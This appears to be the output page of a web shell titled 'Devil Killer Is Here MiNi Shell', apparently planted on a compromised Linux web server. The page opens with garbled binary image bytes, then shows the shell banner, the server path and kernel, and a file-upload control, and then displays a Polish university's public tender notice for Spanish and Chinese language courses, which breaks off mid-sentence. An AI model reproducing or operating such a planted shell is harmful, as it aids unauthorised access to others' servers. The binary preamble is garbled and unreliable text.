JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210322/0002108602-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00021086 z dnia 2021-03-22</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Kurs języka hiszpańskiego i chińskiego dla kadry dydaktycznej i zarządzającej Uczelni" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Białostocka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001672</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wiejska 45A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Białystok</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">15-351</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podlaskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL841 - Białostocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampubl@pb.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pb.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Kurs języka hiszpańskiego i chińskiego dla kadry dydaktycznej i zarządzającej Uczelni" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e6b16a99-8595-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00021086</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-03-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> "PB 2020 – Zintegrowany Program Rozwoju Politechniki Białostockiej” i ,,ZIREG – Zintegrowany Program Politechniki Białostockiej na rzecz Rozwoju Regionalnego” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pb.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzieleniezamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną zapośrednictwem Platformy Zakupowej Marketplanet https:/pb.ezamawiajacy.pl/ oraz pocztyelektronicznej – zampubl@pb.edu.pl Oświadczenia, wnioski, zawiadomienia, odwołania orazinformacje Zamawiający i Wykonawcy przekazują za pośrednictwem Platformy ZakupowejMarketplanet pod adresem internetowym: https:/pb.ezamawiajacy.pl/ lub przy pomocy pocztyelektronicznej. Wszelkie oświadczenia, wnioski, zawiadomienia, odwołania oraz informacje,przekazywane za pomocą poczty elektronicznej muszą zawierać w tytule wiadomości numerreferencyjny sprawy, której ona dotyczy (K-DZP.262.22.2021).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3. Ogólne zasady korzystania z Platformy:1) zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Politechniki Białostockiej pod adresem internetowym Platforma Zakupowa Marketplanet https://pb.ezamawiajacy.pl/ lub Platforma Zakupowa Marketplanethttps://oneplace.marketplanet.pl.2) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanieprzekierowany do strony Platforma Zakupowa Marketplanet https://oneplace.marketplanet.pl/, gdziezostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawcazakłada konto wykonując kroki procesu rejestracyjnego: podaje adres e-mail, ustanawia hasło,następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”;3) rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zalecaWykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postacielektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzymainformacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować siępod numerem telefonu podanym w ww. potwierdzeniu;4) po założeniu konta Wykonawca mamożliwość złożenia Oferty w postępowaniu oraz sporządzania, wysyłania i odbierania korespondencjielektronicznej;5) Ofertę wraz z wymaganymi załącznikami składa się w postaci elektronicznej, opatrzonych kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistymprzez osoby umocowane, pod rygorem nieważności na Platformie Zakupowej Marketplanet w zakładce„Oferty”.6) korzystanie z Platformy jest bezpłatne.4. Zamawiający określa niezbędne wymaganiasprzętowo-aplikacyjne umożliwiające pracę na Platformie Zakupowej, tj.:1) stały dostęp do sieciInternet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;2) komputer klasy PC lub MAC, onastępującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemówoperacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;3) zainstalowana dowolnaprzeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji, w przypadku InternetExplorer minimalnie wersja 10.0;4) włączona obsługa JavaScript;5) zainstalowany program AcrobatReader lub inny obsługujący pliki w formacie .pdf.5. Zamawiający określa dopuszczalne formatyprzesyłanych danych, tj.: plików o wielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt,docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4,ogg, ogv, zip, tar, gz, gzip, 7z,</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Odbiorcą Pani/Pana danych osobowych będąupoważnieni pracownicy Zamawiającego (Politechniki Białostockiej) oraz spółka Otwarty RynekElektroniczny S.A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną do RejestruPrzedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla m.st.Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS:0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na którejZamawiający (Politechnika Białostocka) prowadzi postępowania o udzielenie zamówienia publicznego,działającą pod adresem: Platforma Zakupowa Marketplanet https://pb.ezamawiajacy.pl/.2. Klauzulainformacyjna z art. 13 RODO stanowi załącznik nr 5 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">K-DZP.262.22.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są kurs języka hiszpańskiego ,,PB 2020 – Zintegrowany Program Rozwoju Politechniki Białostockiej” i ,,ZIREG – Zintegrowany Program Politechniki Białostockiej na rzecz Rozwoju Regionalnego” współfinansowanych przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020, Oś Priorytetowa III Szkolnictwo wyższe dla gospodarki i rozwoju, Działanie 3.5 Kompleksowe programy szkół wyższych.1)	Forma kursu: zajęcia indywidualne z lektorem lub native speakerem dla pracownika Politechniki Białostockiej na poziomie dostosowanym do poziomu kompetencji językowej uczestnika (A1-C1). 2)	Zamawiający przewiduje, że Wykonawca przeprowadzi 100 godzin dydaktycznych (1 godzina dydaktyczna = 45 min.) tj. 75 godzin zegarowych. Podana liczba godzin jest jedynie ilości szacunkową, służącą do porównania złożonych ofert. 3)	Liczba pracowników biorących udział w kursie: 1 osoba. 4)	Maksymalna wartość umowy brutto wyniesie: 9 000,00 zł. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 0 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80580000-3 - Oferowanie kursów językowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Zanajkorzystniejszą ofertę zostanie uznana oferta przedstawiająca najkorzystniejszy bilans ceny ipozostałych kryteriów, z zastrzeżeniem art. 248-251 ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie lektora/native speakera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Zanajkorzystniejszą ofertę zostanie uznana oferta przedstawiająca najkorzystniejszy bilans ceny ipozostałych kryteriów, z zastrzeżeniem art. 248-251 ustawy Pzp. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są kurs języka chińskiego dla kadry dydaktycznej i zarządzającejUczelni w ramach projektów ,,PB 2020 – Zintegrowany Program Rozwoju PolitechnikiBiałostockiej” i ,,ZIREG – Zintegrowany Program Politechniki Białostockiej na rzecz RozwojuRegionalnego” współfinansowanych przez Unię Europejską ze środków EuropejskiegoFunduszu Społecznego w ramach Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020, Oś Priorytetowa III Szkolnictwo wyższe dla gospodarki i rozwoju, Działanie 3.5Kompleksowe programy szkół wyższych.1)	Forma kursu: zajęcia indywidualne z native speakerem dla pracownika Politechniki Białostockiej na poziomie dostosowanym do poziomu kompetencji językowej uczestnika (A1-C1);2)	Zamawiający przewiduje, że Wykonawca przeprowadzi 200 godzin dydaktycznych (1 godzina dydaktyczna = 45 min.) tj. 150 godzin zegarowych. Podana liczba godzin jest jedynie ilości szacunkową, służącą do porównania złożonych ofert. 3)	Liczba pracowników biorących udział w kursie: 1 osoba. 4)	Maksymalna wartość umowy brutto wyniesie 16 400,00 zł. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80580000-3 - Oferowanie kursów językowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Za najkorzystniejszą ofertęzostanie uznana oferta przedstawiająca najkorzystniejszy bilans ceny i pozostałych kryteriów, zzastrzeżeniem art. 248-251 ustawy Pzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie native speakera</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.8.) Sposób oceny ofert: </h3> Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Za najkorzystniejszą ofertęzostanie uznana oferta przedstawiająca najkorzystniejszy bilans ceny i pozostałych kryteriów, zzastrzeżeniem art. 248-251 ustawy Pzp. <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału wpostępowaniu dotyczące:zdolności technicznej lub zawodowej:W celu potwierdzenia spełnieniawarunku wykonawca powinien wykazać, że dysponuje lub będzie dysponował osobą, którąskieruje do realizacji niniejszego zamówienia z następującymi kwalifikacjami i doświadczeniemtj.: Część 1:Lektorem, który spełnia łącznie następujące warunki:a) posiada minimum 3 letniedoświadczenie w prowadzeniu kursów z języka hiszpańskiego, w tym przeprowadzenie (usługazakończona) minimum 2 kursów z języka hiszpańskiego dla dorosłych w okresie ostatnich 3 latprzed upływem terminu składania ofert, obejmujących min. 60 godzin dydaktycznych (45 min.)każdy albo trwających przez okres min. 6 miesięcy każdy; kursy mogły być prowadzoneindywidualnie z uczestnikiem bądź w grupach;b) posiada wykształcenie w tym kierunku, tj.ukończone studia 1 lub 2 stopnia na kierunku iberystyka lub certyfikat potwierdzający znajomośćjęzyka hiszpańskiego na poziomie co najmniej C1;d) bardzo dobrze komunikuje się w języku angielskim lub polskim;lubNativespeakerem, który spełnia łącznie następujące warunki:a) posiada minimum 3 letniedoświadczenie w prowadzeniu kursów z języka hiszpańskiego, w tym przeprowadzenie (usługazakończona) minimum 2 kursów z języka hiszpańskiego dla dorosłych w okresie ostatnich 3 latprzed upływem terminu składania ofert, obejmujących min. 60 godzin dydaktycznych (45 min.)każdy albo trwających przez okres min. 6 miesięcy każdy; kursy mogły być prowadzoneindywidualnie z uczestnikiem bądź w grupach;b) posiada wykształcenie wyższe uzyskane wkraju, w którym językiem urzędowym jest język hiszpański lub ukończone studia wyższe, naktórych językiem wykładowym był język hiszpański;c) posiada międzynarodowe certyfikaty lubdyplomy uprawniające do nauczania języka hiszpańskiego, np. Diploma de Español comoLengua Extranjera, Diploma Básico de Español, Diploma Superior de Español, CCSE lub innerównoważne;d) bardzo dobrze komunikuje się w języku angielskim lub polskim.Część 2:Nativespeakerem, który spełnia łącznie następujące warunki::a) posiada minimum 3 letniedoświadczenie w prowadzeniu kursów z języka chińskiego, w tym przeprowadzenie (usługazakończona) minimum 2 kursów z języka chińskiego dla dorosłych w okresie ostatnich 3 latprzed upływem terminu składania ofert, obejmujących min. 60 godzin dydaktycznych (45 min.)każdy albo trwających przez okres min. 6 miesięcy każdy; kursy mogły być prowadzoneindywidualnie z uczestnikiem bądź w grupach;b) posiada wykształcenie wyższe uzyskane wkraju, w którym językiem urzędowym jest język chiński, lub ukończone studia wyższe, którychjęzykiem wykładowym był język chiński;c) posiada chiński certyfikat państwowy potwierdzającypoziom biegłości języka mandaryńskiego na poziomie 1 lub 2; d) bardzo dobrze komunikuje sięw języku angielskim lub polskim.2. W przypadku Wykonawców ubiegających się wspólnie oudzielenie zamówienia, warunek udziału w postępowaniu w zakresie doświadczenia (jeśli zostałokreślony przez Zamawiającego) musi spełniać samodzielnie przynajmniej jeden zWykonawców (członków konsorcjum), który wykona usługi do realizacji których te zdolności sąwymagane. Powyższe zapisy stosuje się odpowiednio w przypadku powoływania się na zasoby podmiotu trzeciego. Niedozwolone jest łączenie doświadczenia Wykonawcy oraz podmiotutrzeciego w celu wykazania spełniania warunku doświadczenia.3. Wykonawca, powołując się nadoświadczenie konsorcjum, którego był członkiem, musi wykazać, że jako uczestnik konsorcjumnabył doświadczenie wymagane przez Zamawiającego. Wykonawca nie może polegać nadoświadczeniu grupy wykonawców, jeżeli faktycznie nie uczestniczył w realizacji wymaganegoprzez Zamawiającego zamówienia.4. Ocena spełniania warunków dokonana zostanie w oparciuo informacje zawarte w dokumentach i oświadczeniach, o których mowa w Rozdziale VIII -XISWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wypełniony formularz ofertowy (wg wzoru Formularz ofertowy – Zał. Nr 1 do SWZ)2.Pełnomocnictwo – w przypadku, gdy oferta została podpisana przez pełnomocnika lub gdy ofertazostała złożona przez Wykonawców wspólnie ubiegających się o udzielenie zamówieniazgodnie z art. 58 ustawy Pzp.1. Oświadczenie o niepodleganiu wykluczeniu – na lub zgodnie zzał. Nr 2 do SWZ. 2. Oświadczenie o spełnieniu warunków udziału w postępowaniu – na lubzgodnie z zał. Nr 3 do SWZ.3. W przypadku Wykonawców wspólnie ubiegających się oudzielenie zamówienia: 1) każdy Wykonawca, w celu potwierdzenia, że nie podlega wykluczeniuoraz spełnia warunki udziału w postępowaniu, zobowiązany jest złożyć oddzielnie oświadczenia,o których mowa w pkt 1 i 2;2) należy złożyć oświadczenie dotyczące realizacji zakresuprzedmiotu zamówienia przez poszczególnych Wykonawców – na lub zgodnie z zał. Nr 3a doSWZ.4. W przypadku, gdy Wykonawca w celu potwierdzenia spełniania warunków udziału wpostępowaniu polega na zdolnościach lub sytuacji innego podmiotu udostępniającego zasoby,zobowiązany jest złożyć:1) Oświadczenie potwierdzające brak podstaw wykluczenia tegopodmiotu- na lub zgodnie z zał. Nr 2 do SWZ. 2) Oświadczenie potwierdzające spełnieniewarunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jegozasoby - na lub zgodnie z zał. Nr 3 do SWZ. 3) Zobowiązanie podmiotu udostępniającegozasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danegozamówienia lub inny środek dowodowy potwierdzający, że Wykonawca realizując zamówienie,będzie dysponował niezbędnymi zasobami tych podmiotów – na lub zgodnie z zał. Nr 3b 